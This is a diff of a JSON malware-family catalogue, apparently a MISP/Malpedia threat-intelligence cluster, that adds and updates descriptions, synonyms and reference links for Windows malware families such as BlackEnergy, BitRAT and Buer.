"https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", "http://www.xylibox.com/2015/04/betabot-retrospective.html", - "https://asert.arbornetworks.com/beta-bot-a-code-review/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" ], @@ -4962,14 +9787,44 @@ "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", "value": "BfBot" }, + { + "description": "Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware", + "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/", + "http://zirconic.net/2018/07/bi_d-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9f80bebb-dc5d-4cc1-b2dc-16bca1bbfaad", + "value": "BI_D Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bifrose", + "https://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/", + "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "47e654af-8b94-4b97-a2ea-6a28c1bc8099", + "value": "bifrose" + }, { "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", + "https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html", + "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", "https://habrahabr.ru/post/213973/", - "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf" + "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/" ], "synonyms": [], "type": [] @@ -4977,6 +9832,20 @@ "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, + { + "description": "Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Binanen-B/detailed-analysis.aspx", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a76a35e4-6ef7-45ad-9656-98584835d910", + "value": "Binanen" + }, { "description": "", "meta": { @@ -4991,6 +9860,19 @@ "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7", "value": "BioData" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bioload", + "https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "04803315-fc17-44d0-839e-534b9da4c7fc", + "value": "bioload" + }, { "description": "", "meta": { @@ -5010,12 +9892,45 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a" ], "synonyms": [], "type": [] }, + "uuid": "fa8b2a91-ec55-41cc-b5f6-3d233cc3cc65", + "value": "BISTROMATH" + }, + { + "description": "Bitpylock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user's Desktop with the following name: \"# # HELP_TO_DECRYPT_YOUR_FILES # .html\". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock", + "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview", + "https://twitter.com/malwrhunterteam/status/1215252402988822529", + "https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "da5adcc1-9adc-4e86-9034-08aafecc14c1", + "value": "BitPyLock" + }, + { + "description": "SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", + "https://content.fireeye.com/apt/rpt-apt38", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf" + ], + "synonyms": [ + "SHADYCAT" + ], + "type": [] + }, "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, @@ -5024,8 +9939,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat", - "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", - "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan" + "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan", + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] @@ -5033,6 +9949,22 @@ "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634", "value": "Bitter RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat", + "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/", + "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", + "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md", + "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8c4363f4-4f38-4a5a-bc87-16f0721bd03b", + "value": "BitRAT" + }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { @@ -5054,25 +9986,47 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://attack.mitre.org/software/S0069/", + "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", - "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1" + "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/" + ], + "synonyms": [ + "PNGRAT", + "ZoxPNG", + "gresim" ], - "synonyms": [], "type": [] }, "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899", "value": "BLACKCOFFEE" }, { - "description": "", + "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo \u201cremote desktop\u201d\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", + "https://threatconnect.com/blog/casting-a-light-on-blackenergy/", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://securelist.com/black-ddos/36309/", + "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/", + "https://www.secureworks.com/research/blackenergy2", "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", - "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf" ], "synonyms": [], "type": [] @@ -5080,15 +10034,63 @@ "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", "value": "BlackEnergy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware", + "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html", + "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "246b6563-edd8-49c7-9d3c-97dc1aec6b81", + "value": "BlackKingdom Ransomware" + }, + { + "description": "Advanced and modern Windows botnet with PHP panel developed using VB.NET", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat", + "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html", + "https://labs.k7computing.com/?p=21365", + "https://github.com/BlackHacker511/BlackNET/", + "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/", + "https://github.com/FarisCode511/BlackNET/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "656c4009-cd79-4501-9fc9-7ad2d97b634c", + "value": "BlackNET RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat", + "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb" + ], + "synonyms": [], + "type": [] + }, + "uuid": "845ce966-fb40-4f12-b9c1-8b97263a589e", + "value": "BlackNix RAT" + }, { "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" ], "synonyms": [ "Kaptoxa", + "MMon", "POSWDS", "Reedum" ], @@ -5101,8 +10103,24 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", - "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/", + "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/" + ], + "synonyms": [ + "BlackRAT" + ], + "type": [] + }, + "uuid": "b1302517-d5c9-44bb-833d-4396365915db", + "value": "BlackRemote" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution" ], "synonyms": [], "type": [] @@ -5126,6 +10144,20 @@ "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79", "value": "BlackRouter" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby", + "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/", + "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "617d53dd-1143-4146-bbc0-39e975a26fe5", + "value": "Blackruby Ransomware" + }, { "description": "", "meta": { @@ -5133,6 +10165,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/" ], @@ -5142,6 +10175,85 @@ "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", "value": "BlackShades" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksoul", + "https://quointelligence.eu/2021/01/reconhellcat-uses-nist-theme-as-lure-to-deliver-new-blacksoul-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "58701e4d-87aa-45a5-adfd-9b20f50fea91", + "value": "BlackSoul" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat", + "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html", + "https://github.com/BlackHacker511/BlackWorm", + "https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "02d2bb6d-9641-406e-9767-58aff2fad6c7", + "value": "Blackworm RAT" + }, + { + "description": "According to SentinelOne, this RAT can gather and transmit a defined set of system features, create/terminate/manipulate processes and files, and has self-updating and deletion capability.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", + "https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/", + "https://www.hvs-consulting.de/lazarus-report/", + "https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html" + ], + "synonyms": [ + "DRATzarus RAT" + ], + "type": [] + }, + "uuid": "44d22b4e-5ad4-4f05-a421-95607706378d", + "value": "BLINDINGCAN" + }, + { + "description": "BLINDTOAD is 64-bit Service DLL that loads an encrypted file from disk and executes it in memory.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad", + "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/", + "https://content.fireeye.com/apt/rpt-apt38" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b34fd401-9d37-4bc6-908f-448c1697f749", + "value": "BLINDTOAD" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether", + "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf" + ], + "synonyms": [ + "CAPGELD" + ], + "type": [] + }, + "uuid": "cf542e2d-531c-4d34-98c8-7e3cb26a32af", + "value": "BLUETHER" + }, { "description": "", "meta": { @@ -5172,8 +10284,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", - "https://asert.arbornetworks.com/communications-bolek-trojan/", - "http://www.cert.pl/news/11379" + "https://securelist.com/kbot-sometimes-they-come-back/96157/", + "http://www.cert.pl/news/11379", + "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt" ], "synonyms": [ "KBOT" @@ -5183,6 +10296,51 @@ "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", "value": "Bolek" }, + { + "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate \u2018Dwrite.dll\u2019 provided by the Microsoft DirectX Typography Services. The application loads the \u2018gdi\u2019 library, which loads the \u2018gdiplus\u2019 library, which ultimately loads \u2018Dwrite\u2019. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite", + "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a24eb119-d526-4aa4-ab5f-171ccddd4fbc", + "value": "BOOSTWRITE" + }, + { + "description": "BOOTWRECK is a master boot record wiper malware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck", + "https://content.fireeye.com/apt/rpt-apt38", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/" + ], + "synonyms": [ + "MBRkiller" + ], + "type": [] + }, + "uuid": "174b9314-765e-44d0-a761-10d352f4466c", + "value": "BOOTWRECK" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.borr", + "https://twitter.com/ViriBack/status/1222704498923032576", + "https://github.com/onek1lo/Borr-Stealer", + "https://telegra.ph/Borr-Malware-02-04" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e016e652-8d02-45c4-a268-fe4c588ebd3d", + "value": "Borr" + }, { "description": "", "meta": { @@ -5224,15 +10382,23 @@ "value": "BRAIN" }, { - "description": "", + "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim\u2019s networks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", + "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" + ], + "synonyms": [ + "SORRYBRUTE" ], - "synonyms": [], "type": [] }, "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", @@ -5265,7 +10431,7 @@ "value": "BreachRAT" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" @@ -5290,12 +10456,29 @@ "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler", + "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + ], + "synonyms": [ + "down_new" + ], + "type": [] + }, + "uuid": "9a544700-13e3-490f-ae4e-45b3fd159546", + "value": "BROLER" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader", - "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html" + "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html", + "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later", + "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/" ], "synonyms": [], "type": [] @@ -5322,6 +10505,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", "https://github.com/nccgroup/Royal_APT", + "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -5357,17 +10541,46 @@ "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66", "value": "BUBBLEWRAP" }, + { + "description": "Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer", + "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.minerva-labs.com/stopping-buerloader", + "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", + "https://twitter.com/StopMalvertisin/status/1182505434231398401", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/", + "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + "https://twitter.com/SophosLabs/status/1321844306970251265", + "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/" + ], + "synonyms": [ + "Buerloader" + ], + "type": [] + }, + "uuid": "b908173c-c89e-400e-b69d-da411120dae2", + "value": "Buer" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045f" ], "synonyms": [], "type": [] }, - "uuid": "16794655-c0e2-4510-9169-f862df104045", - "value": "Bugat" + "uuid": "eca37457-cdd4-44c7-ad07-7a4a863e8765", + "value": "BUFFETLINE" }, { "description": "", @@ -5377,9 +10590,15 @@ "https://malware-research.org/carbanak-source-code-leaked/", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", + "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/", + "https://www.scythe.io/library/threatthursday-buhtrap", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", - "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", - "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/" + "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code", + "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/", + "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/" ], "synonyms": [ "Ratopak" @@ -5394,7 +10613,6 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", - "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", 